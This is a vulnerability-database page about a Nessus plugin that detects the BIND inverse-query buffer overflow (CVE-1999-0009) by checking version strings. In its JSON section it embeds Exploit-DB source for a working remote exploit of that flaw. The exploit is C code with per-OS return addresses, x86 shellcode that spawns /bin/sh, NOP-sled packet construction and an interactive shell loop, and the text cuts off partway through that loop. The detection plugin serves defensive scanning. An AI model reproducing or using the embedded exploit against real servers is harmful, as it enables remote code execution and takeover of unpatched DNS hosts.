Search...

ISC BIND < 4.9.7 / 8.1.2 Inverse-Query Remote Overflow

2002-04-02T00:00:00

ID BIND_IQUERY.NASL
Type nessus
Reporter This script is Copyright (C) 2002-2018 Tenable Network Security, Inc.
Modified 2021-01-02T00:00:00

Description

The remote BIND server, according to its version number, is vulnerable to an inverse query overflow which could allow an attacker to execute arbitrary code on the remote host.

                                        
                                            #
# (C) Tenable Network Security, Inc.
#

# This script replaces bind_bof.nes


include("compat.inc");

if (description)
{
 script_id(10329);
 script_version("1.19");
 script_cvs_date("Date: 2018/06/27 18:42:25");

 script_cve_id("CVE-1999-0009");
 script_bugtraq_id(134);
 
 script_name(english:"ISC BIND &lt; 4.9.7 / 8.1.2 Inverse-Query Remote Overflow");
 script_summary(english:"Checks the remote BIND version");
 
 script_set_attribute(attribute:"synopsis", value:
"It is possible to use the remote name server to break into the
remote host." );
 script_set_attribute(attribute:"description", value:
"The remote BIND server, according to its version number, is 
vulnerable to an inverse query overflow which could allow an attacker 
to execute arbitrary code on the remote host." );
 script_set_attribute(attribute:"solution", value:
"Upgrade to BIND 8.1.2 or 4.9.7 or newer" );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
 script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"true");

 script_set_attribute(attribute:"plugin_publication_date", value: "2002/04/02");
 script_set_attribute(attribute:"vuln_publication_date", value: "1998/04/08");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_set_attribute(attribute:"cpe", value:"cpe:/a:isc:bind");
 script_end_attributes();
 
 script_category(ACT_GATHER_INFO);
 script_copyright(english:"This script is Copyright (C) 2002-2018 Tenable Network Security, Inc.");
 script_family(english: "DNS");
 script_dependencie("bind_version.nasl");
 script_require_keys("bind/version");
 exit(0);
}

vers = get_kb_item("bind/version");
if(!vers)exit(0);
if(ereg(string:vers,
	 pattern:"^8\.((0\..*)|(1\.[0-1]([^0-9]|$))).*"))security_hole(53);

if(ereg(string:vers,
    	pattern:"^4\.([0-8]\.|9\.[0-6]([^0-9]|$)).*"))security_hole(53);

JSON Vulners Source

Initial Source

{"id": "BIND_IQUERY.NASL", "bulletinFamily": "scanner", "title": "ISC BIND < 4.9.7 / 8.1.2 Inverse-Query Remote Overflow", "description": "The remote BIND server, according to its version number, is \nvulnerable to an inverse query overflow which could allow an attacker \nto execute arbitrary code on the remote host.", "published": "2002-04-02T00:00:00", "modified": "2021-01-02T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://www.tenable.com/plugins/nessus/10329", "reporter": "This script is Copyright (C) 2002-2018 Tenable Network Security, Inc.", "references": [], "cvelist": ["CVE-1999-0009"], "type": "nessus", "lastseen": "2021-01-01T01:21:57", "edition": 23, "viewCount": 4, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-1999-0009"]}, {"type": "osvdb", "idList": ["OSVDB:913"]}, {"type": "exploitdb", "idList": ["EDB-ID:19112", "EDB-ID:19111"]}, {"type": "nessus", "idList": ["HPUX_PHNE_12957.NASL"]}], "modified": "2021-01-01T01:21:57", "rev": 2}, "score": {"value": 8.1, "vector": "NONE", "modified": "2021-01-01T01:21:57", "rev": 2}, "vulnersScore": 8.1}, "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# This script replaces bind_bof.nes\n\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(10329);\n script_version(\"1.19\");\n script_cvs_date(\"Date: 2018/06/27 18:42:25\");\n\n script_cve_id(\"CVE-1999-0009\");\n script_bugtraq_id(134);\n \n script_name(english:\"ISC BIND < 4.9.7 / 8.1.2 Inverse-Query Remote Overflow\");\n script_summary(english:\"Checks the remote BIND version\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"It is possible to use the remote name server to break into the\nremote host.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote BIND server, according to its version number, is \nvulnerable to an inverse query overflow which could allow an attacker \nto execute arbitrary code on the remote host.\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to BIND 8.1.2 or 4.9.7 or newer\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2002/04/02\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"1998/04/08\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:isc:bind\");\n script_end_attributes();\n \n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2002-2018 Tenable Network Security, Inc.\");\n script_family(english: \"DNS\");\n script_dependencie(\"bind_version.nasl\");\n script_require_keys(\"bind/version\");\n exit(0);\n}\n\nvers = get_kb_item(\"bind/version\");\nif(!vers)exit(0);\nif(ereg(string:vers,\n\t pattern:\"^8\\.((0\\..*)|(1\\.[0-1]([^0-9]|$))).*\"))security_hole(53);\n\nif(ereg(string:vers,\n \tpattern:\"^4\\.([0-8]\\.|9\\.[0-6]([^0-9]|$)).*\"))security_hole(53);\n\n", "naslFamily": "DNS", "pluginID": "10329", "cpe": ["cpe:/a:isc:bind"], "scheme": null}

{"cve": [{"lastseen": "2020-10-03T11:36:54", "description": "Inverse query buffer overflow in BIND 4.9 and BIND 8 Releases.", "edition": 3, "cvss3": {}, "published": "1998-04-08T04:00:00", "title": "CVE-1999-0009", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-1999-0009"], "modified": "2018-10-30T16:26:00", "cpe": ["cpe:/o:sgi:irix:4.0.5d", "cpe:/a:isc:bind:4.9.6", "cpe:/a:data_general:dg_ux:5.4_4.11", "cpe:/o:redhat:linux:4.2", "cpe:/a:isc:bind:8.1", "cpe:/o:sun:solaris:2.5.1", "cpe:/o:netbsd:netbsd:1.2", "cpe:/o:sgi:irix:3.3.1", "cpe:/o:sgi:irix:4.0.5f", "cpe:/o:sgi:irix:3.3", "cpe:/o:sgi:irix:5.1.1", "cpe:/o:sgi:irix:5.0", "cpe:/o:sgi:irix:4.0.5_iop", "cpe:/a:data_general:dg_ux:5.4_3.0", "cpe:/o:sgi:irix:4.0.5a", "cpe:/o:sgi:irix:4.0.5g", "cpe:/o:ibm:aix:4.1.5", "cpe:/o:sgi:irix:4.0.5", "cpe:/o:sgi:irix:5.3", "cpe:/o:bsdi:bsd_os:2.1", "cpe:/o:nec:asl_ux_4800:64", "cpe:/o:caldera:openlinux:1.0", "cpe:/o:sun:solaris:2.6", "cpe:/o:sgi:irix:4.0.1", "cpe:/o:sgi:irix:4.0.3", "cpe:/o:sgi:irix:4.0.5e", "cpe:/o:sun:sunos:-", "cpe:/o:sgi:irix:4.0.4t", "cpe:/o:redhat:linux:5.0", "cpe:/o:sgi:irix:6.3", "cpe:/o:ibm:aix:4.2", "cpe:/o:netbsd:netbsd:1.3", "cpe:/o:sgi:irix:3.3.2", "cpe:/o:netbsd:netbsd:1.2.1", "cpe:/o:sgi:irix:4.0", "cpe:/o:ibm:aix:4.1.1", "cpe:/a:data_general:dg_ux:5.4_4.1", "cpe:/o:sgi:irix:4.0.1t", "cpe:/o:netbsd:netbsd:1.3.1", "cpe:/o:sgi:irix:4.0.2", "cpe:/o:sgi:irix:5.0.1", "cpe:/o:ibm:aix:4.3", "cpe:/o:sun:sunos:5.5.1", "cpe:/o:sco:unixware:7.0", "cpe:/o:sgi:irix:5.1", "cpe:/o:redhat:linux:4.1", "cpe:/o:netbsd:netbsd:1.1", "cpe:/o:ibm:aix:4.1", "cpe:/o:ibm:aix:4.1.2", "cpe:/o:sgi:irix:4.0.4b", "cpe:/o:ibm:aix:4.1.3", "cpe:/o:netbsd:netbsd:1.0", "cpe:/o:bsdi:bsd_os:2.0.1", "cpe:/o:sun:sunos:5.4", "cpe:/o:sun:sunos:5.5", "cpe:/o:sgi:irix:4.0.4", "cpe:/a:isc:bind:8.1.1", "cpe:/o:sgi:irix:4.0.5_ipr", "cpe:/o:bsdi:bsd_os:2.0", "cpe:/o:sco:unixware:2.1", "cpe:/o:ibm:aix:4.1.4", "cpe:/o:redhat:linux:4.0", "cpe:/o:sgi:irix:6.0", "cpe:/o:sgi:irix:5.2", "cpe:/o:sgi:irix:4.0.5h", "cpe:/o:ibm:aix:4.2.1", "cpe:/o:sgi:irix:6.2", "cpe:/o:sco:open_desktop:3.0", "cpe:/o:sco:open_desktop:5.0", "cpe:/o:sun:solaris:2.5", "cpe:/o:sgi:irix:3.3.3", "cpe:/o:sgi:irix:6.1", "cpe:/o:sun:sunos:5.3", "cpe:/a:data_general:dg_ux:5.4_3.1", "cpe:/o:sgi:irix:3.2"], "id": "CVE-1999-0009", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0009", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:sgi:irix:4.0.5g:*:*:*:*:*:*:*", "cpe:2.3:o:sun:sunos:5.5:*:*:*:*:*:*:*", "cpe:2.3:o:sun:sunos:-:*:*:*:*:*:*:*", "cpe:2.3:o:sco:unixware:2.1:*:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:8.1:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:3.3:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:4.0.5_ipr:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:4.0.4b:*:*:*:*:*:*:*", "cpe:2.3:o:netbsd:netbsd:1.3.1:*:*:*:*:*:*:*", "cpe:2.3:o:ibm:aix:4.2:*:*:*:*:*:*:*", "cpe:2.3:o:ibm:aix:4.1.3:*:*:*:*:*:*:*", "cpe:2.3:o:bsdi:bsd_os:2.0:*:*:*:*:*:*:*", "cpe:2.3:o:caldera:openlinux:1.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:linux:4.2:*:*:*:*:*:*:*", "cpe:2.3:a:data_general:dg_ux:5.4_4.11:*:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:8.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:sco:open_desktop:5.0:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:ibm:aix:4.1.4:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:data_general:dg_ux:5.4_3.1:*:*:*:*:*:*:*", "cpe:2.3:o:sun:sunos:5.5.1:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:linux:4.1:*:*:*:*:*:*:*", "cpe:2.3:o:sun:sunos:5.3:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:4.0.5d:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:4.0.5h:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:6.2:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:5.2:*:*:*:*:*:*:*", "cpe:2.3:o:sun:solaris:2.6:*:*:*:*:*:*:*", "cpe:2.3:o:ibm:aix:4.1.5:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:5.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:4.0.5a:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:5.3:*:*:*:*:*:*:*", "cpe:2.3:o:netbsd:netbsd:1.2.1:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:4.0.4t:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:6.1:*:*:*:*:*:*:*", "cpe:2.3:o:ibm:aix:4.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:3.3.2:*:*:*:*:*:*:*", "cpe:2.3:o:netbsd:netbsd:1.3:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:5.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:linux:4.0:*:*:*:*:*:*:*", "cpe:2.3:o:sun:solaris:2.5.1:*:ppc:*:*:*:*:*", "cpe:2.3:o:sgi:irix:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:5.0.1:*:*:*:*:*:*:*", "cpe:2.3:o:nec:asl_ux_4800:64:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:5.1:*:*:*:*:*:*:*", "cpe:2.3:o:netbsd:netbsd:1.0:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:4.0:*:*:*:*:*:*:*", "cpe:2.3:o:netbsd:netbsd:1.1:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:4.0.1:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:3.2:*:*:*:*:*:*:*", "cpe:2.3:o:ibm:aix:4.3:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:4.0.5_iop:*:*:*:*:*:*:*", "cpe:2.3:o:ibm:aix:4.1:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:3.3.3:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:4.0.1t:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:6.3:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:4.0.5e:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:4.0.5f:*:*:*:*:*:*:*", "cpe:2.3:a:data_general:dg_ux:5.4_4.1:*:*:*:*:*:*:*", "cpe:2.3:o:bsdi:bsd_os:2.1:*:*:*:*:*:*:*", "cpe:2.3:o:sun:solaris:2.5.1:*:x86:*:*:*:*:*", "cpe:2.3:o:redhat:linux:5.0:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:3.3.1:*:*:*:*:*:*:*", "cpe:2.3:o:ibm:aix:4.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:data_general:dg_ux:5.4_3.0:*:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:4.9.6:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:4.0.5:*:*:*:*:*:*:*", "cpe:2.3:o:netbsd:netbsd:1.2:*:*:*:*:*:*:*", "cpe:2.3:o:sun:solaris:2.5:*:x86:*:*:*:*:*", "cpe:2.3:o:sco:unixware:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:sun:sunos:5.4:*:*:*:*:*:*:*", "cpe:2.3:o:sco:open_desktop:3.0:*:*:*:*:*:*:*", "cpe:2.3:o:bsdi:bsd_os:2.0.1:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:o:ibm:aix:4.2.1:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:19:55", "bulletinFamily": "software", "cvelist": ["CVE-1999-0009"], "edition": 1, "description": "# No description provided by the source\n\n## References:\n[Vendor Specific Advisory URL](ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA1998-001.txt.asc)\nISS X-Force ID: 895\n[CVE-1999-0009](https://vulners.com/cve/CVE-1999-0009)\nCERT: CA-1998-05\nBugtraq ID: 134\n", "modified": "1998-04-08T00:00:00", "published": "1998-04-08T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:913", "id": "OSVDB:913", "title": "ISC BIND Inverse-Query Remote Overflow", "type": "osvdb", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-02T11:06:40", "description": "BSDI BSD/OS 2.1,Caldera OpenLinux Standard 1.0,Data General DG/UX 5.4 4.11,IBM AIX 4.3,ISC BIND 8.1.1,NetBSD 1.3.1,RedHat Linux 5.0,SCO Open Desktop 3.0/Serv...", "published": "1998-04-08T00:00:00", "type": "exploitdb", "title": "Multiple OSes - BIND Buffer Overflow 1", "bulletinFamily": "exploit", "cvelist": ["CVE-1999-0009"], "modified": "1998-04-08T00:00:00", "id": "EDB-ID:19111", "href": "https://www.exploit-db.com/exploits/19111/", "sourceData": "source: http://www.securityfocus.com/bid/134/info\r\n\r\nA buffer overflow exists in certain versions of BIND, the nameserver daemon currently maintained by the Internet Software Consortium (ISC). BIND fails to properly bound the data recieved when processing an inverse query. Upon a memory copy, portions of the program can be overwritten, and arbitrary commands run on the affected host.\r\n\r\nExploits for this vulnerability are very widespread, and were posted to the Bugtraq mailing list.\r\n\r\n/*\r\n * have fun.\r\n * -ROTShB\r\n */\r\n\r\n#include <unistd.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <signal.h>\r\n#include <time.h>\r\n#include <string.h>\r\n#include <ctype.h>\r\n#include <netdb.h>\r\n#include <sys/time.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <arpa/inet.h>\r\n#include <arpa/nameser.h>\r\n\r\n#define DEFAULT_TARGET 0\r\n#define DEFAULT_OPTIMIZATION 0\r\n#define DEFAULT_ANBUF_OFFSET 300\r\n#define DLEN_VAL 4\r\n#define NPACKETSZ 512\r\n#define NMAXDNAME 1025\r\n#define PRE_EGG_DATALEN (1+(sizeof(short)*3)+sizeof(long))\r\n#define ALEN_VAL (DLEN_VAL+PRE_EGG_DATALEN)\r\n#define BUFFSIZE 4096\r\n\r\nstruct target_type\r\n{\r\n char desc[40];\r\n int systype;\r\n unsigned long addr;\r\n unsigned long opt_addr;\r\n int fd;\r\n};\r\n\r\nstruct target_type target[] =\r\n{\r\n {\"x86 Linux 2.0.x named 4.9.5-REL (se)\",0,0xbffff21c,0xbffff23c,4},\r\n {\"x86 Linux 2.0.x named 4.9.5-REL (le)\",0,0xbfffeedc,0xbfffeefc,4},\r\n {\"x86 Linux 2.0.x named 4.9.5-P1 (se)\",0,0xbffff294,0xbffff2cc,4},\r\n {\"x86 Linux 2.0.x named 4.9.5-P1 (le)\",0,0xbfffef8c,0xbfffefb4,4},\r\n {\"x86 Linux 2.0.x named 4.9.6-REL (se)\",0,0xbffff3e3,0xbffff403,4},\r\n {\"x86 Linux 2.0.x named 4.9.6-REL (le)\",0,0xbffff188,0xbffff194,4},\r\n {\"x86 Linux 2.0.x named 8.1-REL (se)\",0,0xbffff6a4,0xbffff6f8,5},\r\n {\"x86 Linux 2.0.x named 8.1-REL (le)\",0,0xbffff364,0xbffff3b8,5},\r\n {\"x86 Linux 2.0.x named 8.1.1 (se)\",0,0xbffff6b8,0xbffff708,5},\r\n {\"x86 Linux 2.0.x named 8.1.1 (le)\",0,0xbffff378,0xbffff3c8,5},\r\n {\"x86 FreeBSD 3.x named 4.9.5-REL (se)\",1,0xefbfd260,0xefbfd2c8,4},\r\n {\"x86 FreeBSD 3.x named 4.9.5-REL (le)\",1,0xefbfd140,0xefbfd1a8,4},\r\n {\"x86 FreeBSD 3.x named 4.9.5-P1 (se)\",1,0xefbfd260,0xefbfd2c8,4},\r\n {\"x86 FreeBSD 3.x named 4.9.5-P1 (le)\",1,0xefbfd140,0xefbfd1a8,4},\r\n {\"x86 FreeBSD 3.x named 4.9.6-REL (se)\",1,0xefbfd480,0xefbfd4e8,4},\r\n {\"x86 FreeBSD 3.x named 4.9.6-REL (le)\",1,0xefbfd218,0xefbfd274,4},\r\n {{0},0,0,0,0}\r\n};\r\n\r\nunsigned long resolve(char *host)\r\n\r\n{\r\n long i;\r\n struct hostent *he;\r\n\r\n if((i=inet_addr(host))==(-1))\r\n if((he=gethostbyname(host))==NULL)\r\n return(0);\r\n else\r\n return(*(unsigned long *)he->h_addr);\r\n\r\n return(i);\r\n}\r\n\r\nint send_packet(int fd, char *buff, int len)\r\n{\r\n char tmp[2], *ptr=tmp;\r\n\r\n PUTSHORT(len,ptr);\r\n\r\n if(write(fd,tmp,2)!=2)\r\n return(-1);\r\n\r\n if(write(fd,buff,len)!=len)\r\n return(-1);\r\n\r\n return(1);\r\n}\r\n\r\nint attack(int fd, struct target_type t, unsigned long offset, int optimized)\r\n{\r\n char buff[BUFFSIZE], *ptr=buff;\r\n HEADER *dnsh=(HEADER *)buff;\r\n unsigned long i;\r\n int dlen, len=0;\r\n\r\n (void)memset(dnsh,0,sizeof(HEADER));\r\n\r\n dnsh->id = htons(31337);\r\n dnsh->opcode = IQUERY;\r\n dnsh->rd = 1;\r\n dnsh->ra = 1;\r\n dnsh->ancount = htons(1);\r\n\r\n ptr += sizeof(HEADER);\r\n len += sizeof(HEADER);\r\n\r\n *ptr = '\\0';\r\n ptr++;\r\n\r\n i = T_A;\r\n PUTSHORT(i,ptr);\r\n\r\n i = C_IN;\r\n PUTSHORT(i,ptr);\r\n\r\n i = 31337;\r\n PUTLONG(i,ptr);\r\n\r\n if(t.systype==0)\r\n {\r\n char c0de[] =\r\n \"\\x31\\xc0\\xb0\\x3f\\x31\\xdb\\xb3\\xff\\x31\\xc9\\xcd\\x80\\x31\\xc0\\xb0\\x3f\\xb1\"\r\n \"\\x01\\xcd\\x80\\x31\\xc0\\xb0\\x3f\\xb1\\x02\\xcd\\x80\\xeb\\x24\\x5e\\x8d\\x1e\\x89\"\r\n \"\\x5e\\x0b\\x33\\xd2\\x89\\x56\\x07\\x89\\x56\\x0f\\xb8\\x1b\\x56\\x34\\x12\\x35\\x10\"\r\n \"\\x56\\x34\\x12\\x8d\\x4e\\x0b\\x8b\\xd1\\xcd\\x80\\x33\\xc0\\x40\\xcd\\x80\\xe8\\xd7\"\r\n \"\\xff\\xff\\xff/bin/sh\";\r\n\r\n if(optimized)\r\n dlen = NPACKETSZ+(NMAXDNAME+3)+8-PRE_EGG_DATALEN;\r\n else\r\n dlen = NPACKETSZ+(NMAXDNAME+3)+(sizeof(int)*6)+8-PRE_EGG_DATALEN;\r\n\r\n PUTSHORT(dlen,ptr);\r\n len += PRE_EGG_DATALEN;\r\n\r\n c0de[7] = t.fd;\r\n\r\n (void)memset(ptr,0x90,(sizeof(buff)-(ptr-buff)));\r\n\r\n i = NPACKETSZ-PRE_EGG_DATALEN-sizeof(c0de);\r\n (void)memcpy((ptr+i),c0de,sizeof(c0de));\r\n\r\n if(!optimized)\r\n {\r\n (void)memcpy((ptr+(dlen-16-sizeof(c0de))),c0de,sizeof(c0de));\r\n i = ALEN_VAL;\r\n (void)memcpy((ptr+(dlen-16)),&i,sizeof(i));\r\n i = DLEN_VAL;\r\n (void)memcpy((ptr+(dlen-12)),&i,sizeof(i));\r\n }\r\n else\r\n (void)memcpy((ptr+(dlen-4-sizeof(c0de))),c0de,sizeof(c0de));\r\n\r\n i = (optimized?t.opt_addr:t.addr)+offset;\r\n\r\n len += dlen;\r\n }\r\n\r\n\r\n else if(t.systype==1)\r\n {\r\n char c0de[] =\r\n \"\\xeb\\x6e\\x5e\\xc6\\x06\\x9a\\x31\\xc9\\x89\\x4e\\x01\\xc6\\x46\\x05\\x07\\x88\"\r\n \"\\x4e\\x06\\x51\\x31\\xdb\\xb3\\x04\\x53\\x66\\xc7\\x46\\x07\\xeb\\xa7\\x31\\xc0\"\r\n \"\\xb0\\x5a\\x50\\xeb\\x50\\xfe\\xc1\\x51\\x53\\xc6\\x46\\x08\\xb6\\x31\\xc0\\xb0\"\r\n \"\\x5a\\x50\\xeb\\x41\\xfe\\xc1\\x51\\x53\\xc6\\x46\\x08\\xc5\\x31\\xc0\\xb0\\x5a\"\r\n \"\\x50\\xeb\\x32\\xc7\\x46\\x07\\x2f\\x62\\x69\\x6e\\xc7\\x46\\x0b\\x2f\\x73\\x68\"\r\n \"\\x21\\x31\\xc0\\x88\\x46\\x0e\\x8d\\x5e\\x07\\x89\\x5e\\x0f\\x89\\x46\\x13\\x8d\"\r\n \"\\x5e\\x13\\x53\\x8d\\x5e\\x0f\\x53\\x8d\\x5e\\x07\\x53\\xb0\\x3b\\x50\\xeb\\x05\"\r\n \"\\xe8\\x8d\\xff\\xff\\xff\";\r\n\r\n if(optimized)\r\n dlen = NPACKETSZ+(NMAXDNAME+3)+8-PRE_EGG_DATALEN;\r\n else\r\n dlen = NPACKETSZ+(NMAXDNAME+3)+(sizeof(int)*6)+8-PRE_EGG_DATALEN;\r\n\r\n PUTSHORT(dlen,ptr);\r\n len += PRE_EGG_DATALEN;\r\n\r\n c0de[22] = t.fd;\r\n\r\n (void)memset(ptr,0x90,(sizeof(buff)-(ptr-buff)));\r\n\r\n i = NPACKETSZ-PRE_EGG_DATALEN-sizeof(c0de);\r\n (void)memcpy((ptr+i),c0de,sizeof(c0de));\r\n\r\n if(!optimized)\r\n {\r\n (void)memcpy((ptr+(dlen-16-sizeof(c0de))),c0de,sizeof(c0de));\r\n i = ALEN_VAL;\r\n (void)memcpy((ptr+(dlen-16)),&i,sizeof(i));\r\n i = DLEN_VAL;\r\n (void)memcpy((ptr+(dlen-12)),&i,sizeof(i));\r\n }\r\n else\r\n (void)memcpy((ptr+(dlen-4-sizeof(c0de))),c0de,sizeof(c0de));\r\n\r\n i = (optimized?t.opt_addr:t.addr)+offset;\r\n (void)memcpy((ptr+(dlen-4)),&i,sizeof(i));\r\n\r\n len += dlen;\r\n }\r\n else\r\n return(0);\r\n\r\n return(send_packet(fd,buff,len));\r\n}\r\n\r\nint main(int argc, char *argv[])\r\n{\r\n char xbuf[128], ybuf[128];\r\n unsigned long offset=DEFAULT_ANBUF_OFFSET;\r\n int ti, opt=DEFAULT_OPTIMIZATION, sock, i;\r\n int xlen=0, ylen=0;\r\n fd_set rd, wr;\r\n struct sockaddr_in sa;\r\n\r\n for(i=0;((target[i].addr)||(target[i].opt_addr));i++);\r\n\r\n if(argc<2)\r\n {\r\n (void)fprintf(stderr,\"\\ntarget types:\\n\");\r\n\r\n for(ti=0;ti<i;ti++)\r\n (void)fprintf(stderr,\" %-2d : %s\\n\",ti,target[ti].desc);\r\n\r\n (void)fprintf(stderr,\"\\nerror: usage: %s <host> [tt] [opt] [ofst]\\n\",\r\n argv[0]);\r\n exit(-1);\r\n }\r\n\r\n if(argc>2)\r\n {\r\n ti = atoi(argv[2]);\r\n if((ti<0)||(ti>i))\r\n {\r\n (void)fprintf(stderr,\"error: invalid target type %d\\n\",ti);\r\n exit(-1);\r\n }\r\n }\r\n else\r\n ti = DEFAULT_TARGET;\r\n\r\n if(argc>3)\r\n {\r\n opt = atoi(argv[3]);\r\n if((opt!=0)&&(opt!=1))\r\n {\r\n (void)fprintf(stderr,\"error: invalid optimization setting %d\\n\",opt);\r\n exit(-1);\r\n }\r\n }\r\n\r\n if(argc>4)\r\n offset = atoi(argv[4]);\r\n\r\n\r\n if(!(sa.sin_addr.s_addr=resolve(argv[1])))\r\n {\r\n (void)fprintf(stderr,\"error: can not resolve: %s\\n\",argv[1]);\r\n exit(-1);\r\n }\r\n\r\n sa.sin_family = AF_INET;\r\n sa.sin_port = htons(53);\r\n\r\n if((sock=socket(sa.sin_family,SOCK_STREAM,0))==(-1))\r\n {\r\n (void)perror(\"error: socket\");\r\n exit(-1);\r\n }\r\n\r\n if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))==(-1))\r\n {\r\n (void)perror(\"error: connect\");\r\n exit(-1);\r\n }\r\n\r\n (void)printf(\"target : %s\\n\",inet_ntoa(sa.sin_addr));\r\n (void)printf(\"target type : %s\\n\",target[ti].desc);\r\n (void)printf(\"optimized named : %s\\n\",(opt?\"YES\":\"NO\"));\r\n (void)printf(\"anbuff addr : 0x%x\\n\",(unsigned int)\r\n (i=(opt?target[ti].opt_addr:target[ti].addr)));\r\n (void)printf(\"anbuff addr offset : %lu\\n\",offset);\r\n (void)printf(\"ret addr : 0x%x\\n\",(unsigned int)(i+offset));\r\n (void)printf(\"fd to make dups of : %d\\n\",target[ti].fd);\r\n\r\n (void)printf(\"here we go...\\n\");\r\n\r\n switch(attack(sock,target[ti],offset,opt))\r\n {\r\n case -1:\r\n (void)perror(\"error: attack\");\r\n exit(-1);\r\n break;\r\n\r\n case 0:\r\n (void)fprintf(stderr,\"error: internal error\\n\");\r\n exit(-1);\r\n break;\r\n }\r\n\r\n (void)printf(\"have fun.\\n\");\r\n (void)printf(\"-ROTShB\\n\");\r\n\r\n while(1)\r\n {\r\n FD_ZERO(&rd);\r\n if(ylen<(sizeof(ybuf)-1))\r\n FD_SET(sock,&rd);\r\n if(xlen<(sizeof(xbuf)-1))\r\n FD_SET(fileno(stdin),&rd);\r\n\r\n FD_ZERO(&wr);\r\n if(xlen)\r\n FD_SET(sock,&wr);\r\n if(ylen)\r\n FD_SET(fileno(stdout),&wr);\r\n\r\n if((ti=select((sock+1),&rd,&wr,NULL,NULL))==(-1))\r\n {\r\n (void)perror(\"error: select\");\r\n break;\r\n }\r\n\r\n if(FD_ISSET(fileno(stdin),&rd))\r\n {\r\n if((i=read(fileno(stdin),(xbuf+xlen),(sizeof(xbuf)-xlen)))==(-1))\r\n {\r\n (void)perror(\"error: read\");\r\n exit(-1);\r\n }\r\n else if(i==0)\r\n 